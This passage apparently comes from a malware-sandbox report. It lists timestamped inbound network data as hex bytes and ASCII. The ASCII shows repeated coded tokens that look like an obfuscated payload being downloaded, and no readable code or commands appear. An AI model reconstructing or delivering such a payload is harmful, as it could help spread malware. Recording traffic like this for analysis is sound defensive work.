XO O DW O Eq O Xq O DW O MO O DW O DW O qqX O DW O DM O XW O DW O qOO
2021-10-29 18:50:00 UTC	1039	IN	Data Raw: 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 45 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f Data Ascii: O DW O qOp O DW O DM O EE O DW O MX O qqM O DD O qqW O DW O EJ O XW O DW O MX O Xq O DW O qOM O DW O Eq O WJ O DW O MM O qqM O DW O DW O DW O DW O DW O DW O Xm O Em O qqM O qOM O DW O DM O DM O DW O qOO O Xq O DD O mX O DW O Eq O WD O DW O Ep O DW O DD O
2021-10-29 18:50:00 UTC	1040	IN	Data Raw: 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 57 70 20 4f 20 71 Data Ascii: O MO O qqM O qOM O DW O DM O WD O DW O MM O DW O DD O mX O DW O Eq O qOE O DW O MX O qqM O DD O qqE O DW O EJ O EE O DW O DW O DW O DE O Xq O DW O DE O XM O DW O Xp O DW O DD O qOX O DW O Eq O qqM O DW O MM O DW O DW O DW O DW O Ep O DW O DW O Xq O Wp O q
2021-10-29 18:50:00 UTC	1042	IN	Data Raw: 57 20 4f 20 44 44 20 4f 20 45 71 20 4f 20 71 71 4f 20 4f 20 44 4d 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 45 58 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f Data Ascii: W O DD O Eq O qqO O DM O qOp O DW O XD O DW O DD O EX O DW O DM O qqM O DW O Ep O DW O DD O Xp O DW O Eq O XW O DW O MM O DW O DD O qqX O DW O EJ O Ep O DW O qOO O DW O DW O qOp O DW O DE O mX O DW O Ep O DW O DD O DD O DW O Eq O qqM O DW O MX O DW O DW O
2021-10-29 18:50:00 UTC	1043	IN	Data Raw: 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 4d 20 4f 20 4d 4d 20 4f 20 45 6d 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 Data Ascii: O mX O DW O EJ O Ep O DW O MX O DW O DW O qqm O DW O EO O DW O DW O MX O DW O DD O mM O DW O EJ O EE O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DM O qOM O MM O Em O qOp O DD O Xq O DW O EJ O Ep O DW O MX O qqM O DD O qqM O DW
2021-10-29 18:50:00 UTC	1044	IN	Data Raw: 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 71 4f 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 Data Ascii: O mE O mE O qOp O DW O DD O XO O DW O DM O qqW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O Xq O DW O DW O DW O DW O DW O DW O EJ O DW O DW O qOp O DW O XO O DW O DW O EW O DW O EM O qOE O DX O mE O mE O mp O DE O DW O DW O DW O DW
2021-10-29 18:50:00 UTC	1046	IN	Data Raw: 44 44 20 4f 20 57 70 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4a 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 4a 20 4f 20 44 57 Data Ascii: DD O Wp O DW O DE O DW O DW O XJ O Xq O DD O WJ O DW O Eq O EE O DW O MO O Xq O DD O qqM O DW O EJ O Xq O DW O ME O Xq O DD O qqX O DW O Eq O WJ O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DD O XW O DW O DW O DW O DW O DW O DD O qOJ O DW
2021-10-29 18:50:00 UTC	1047	IN	Data Raw: 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 Data Ascii: O EE O DW O XM O Xq O DD O mX O DW O Eq O qOE O DW O MX O qqM O DD O qqE O DW O DE O DW O DW O MO O Xq O DD O qJq O DW O EJ O Ep O DW O MX O qqM O DD O qJq O DW O DE O DW O DW O ME O DW O DD O qOm O DW O EJ O EE O DW O Ep O DW O DD O qqX O DW O Eq O EE O
2021-10-29 18:50:00 UTC	1048	IN	Data Raw: 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 Data Ascii: O WD O DW O MX O qOp O DW O qOp O DW O EJ O Xq O DW O MX O qqM O DW O qOp O DW O EJ O Xq O DW O ME O DW O DD O qOX O DW O DE O DW O DW O XM O qqM O DD O qqW O DW O Eq O qOE O DW O MM O DW O DD O qOW O DW O Eq O WD O DW O XM O Xq O DD O qJq O DW O Eq O Xq
2021-10-29 18:50:00 UTC	1050	IN	Data Raw: 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f Data Ascii: Ep O DW O DD O Xm O DW O Eq O qOp O DW O MO O Xq O DD O qqW O DW O Eq O qqM O DW O Ep O DW O DD O DM O DW O Eq O qqM O DW O MO O qqM O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O XW O DW O MM O DW O DE O Xq O
2021-10-29 18:50:00 UTC	1051	IN	Data Raw: 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 57 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 Data Ascii: O DW O DM O qqM O DW O ME O Xq O DD O qqE O DW O Eq O XW O DW O Ep O DW O DD O DD O DW O EJ O Ep O DW O MO O qqM O DD O mM O DW O Eq O mX O DW O MO O Xq O DD O qqE O DW O EJ O Xq O DW O MM O qqM O DW O Wm O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW
2021-10-29 18:50:00 UTC	1052	IN	Data Raw: 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 58 4a 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 71 20 4f 20 44 57 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE O XW O DW O MM O DW O XJ O Xq O DD O MX O DW O DW O qqq O DW O WD O DW O EE O DW O DW O XO O mE O mE O qOp O qOp O DD O Xq O DW O EJ O Ep O DW O ME O Xq
2021-10-29 18:50:00 UTC	1054	IN	Data Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 58 45 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 4d 4d 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 4d 4d 20 Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O EE O DW O DW O XD O DW O EJ O DW O EO O qOE O DW O XE O qqM O DW O Em O DW O XO O MM O DX O DW O DW O DX O mE O mE O WJ O DW O DW O XD O qqM O DD O qqJ O DW O Eq O WJ O DW O MO O DW O DD O qqX O DW O EJ O MM
2021-10-29 18:50:00 UTC	1055	IN	Data Raw: 4f 70 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 Data Ascii: Op O Xq O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O Em O Xq O DD O qqM O DD O qqW O DW O EO O qOE O DW O DE O Xq O DX O mE O DW O qqM O DW O DW O mE O mE O mp O DE O DW O EO O Ep O DW O qOO O Xq O
2021-10-29 18:50:00 UTC	1059	IN	Data Raw: 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 44 Data Ascii: Xq O DD O mX O DW O Eq O qOp O DW O Ep O DW O DD O qqJ O DW O EJ O EE O DW O Ep O DW O DD O qqE O DW O Eq O WD O DW O qOO O DW O DW O qOp O DW O EJ O EE O DW O MM O DW O DD O qOX O DW O Eq O EE O DW O ME O Xq O DD O qOM O DW O Eq O qOE O DW O MO O Xq O DD
2021-10-29 18:50:00 UTC	1063	IN	Data Raw: 20 45 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 71 4a 71 20 4f 20 58 71 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 44 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 6d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 58 71 20 4f 20 44 4d 20 4f 20 58 71 20 4f 20 44 58 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f Data Ascii: EW O EE O DW O qJq O Xq O DE O mX O DW O ED O XM O DW O DD O qqM O Xq O DW O DW O XO O mE O mE O qOm O Xq O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DX O DW O DW O EO O Xq O DM O Xq O DX O qOO O DW O Eq O qOE O
2021-10-29 18:50:00 UTC	1064	IN	Data Raw: 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 44 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 Data Ascii: MM O DW O DW O qOp O DW O Eq O EE O DW O MX O qqM O DD O qqD O DW O EJ O DW O DW O MX O qqM O DD O qJJ O DW O Eq O qOE O DW O qOO O DW O DD O qqJ O DW O Eq O WD O DW O MX O qOp O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O
2021-10-29 18:50:00 UTC	1069	IN	Data Raw: 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 58 57 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 4f 6d 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4f 20 4f 20 44 57 20 4f 20 44 Data Ascii: O DW O DM O XW O DD O Xq O Xq O DW O EM O DW O DW O mX O DM O DW O DW O DX O mE O mE O WJ O DW O DW O XW O qqM O DD O qOm O DW O EJ O XM O DW O MO O Xq O DW O qOp O DW O DM O EE O DW O MX O qqM O DD O qqE O DW O Eq O XM O DW O ME O Xq O DD O qqO O DW O D
2021-10-29 18:50:00 UTC	1073	IN	Data Raw: 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 71 4f 44 20 4f 20 45 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 Data Ascii: qOp O DD O qqJ O DW O Eq O XW O DW O qOO O qqM O DW O qJJ O DW O DX O Ep O DW O DW O DW O DW O DW O DW O DW O DW O DW O qJq O DW O qOD O Ep O qOp O DW O DW O DW O DW O DW O DW O EE O DW O DW O DW O DW O DW O DW O DX O XM O DW O EX O MM O DW O DW O DW O D
2021-10-29 18:50:00 UTC	1077	IN	Data Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 6d 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 57 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 4f 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 Data Ascii: O DW O DW O qOp O DW O Eq O DM O DW O MX O qOp O DD O qOE O DW O DE O DW O DW O Xm O Xq O DD O qqX O DW O EJ O XM O DW O MO O Xq O DW O qOp O DW O DM O Xq O DW O MX O qqM O DD O Wq O DW O Eq O WJ O DW O Ep O DW O DD O qOW O DW O EJ O XW O DW O qOO O DW O
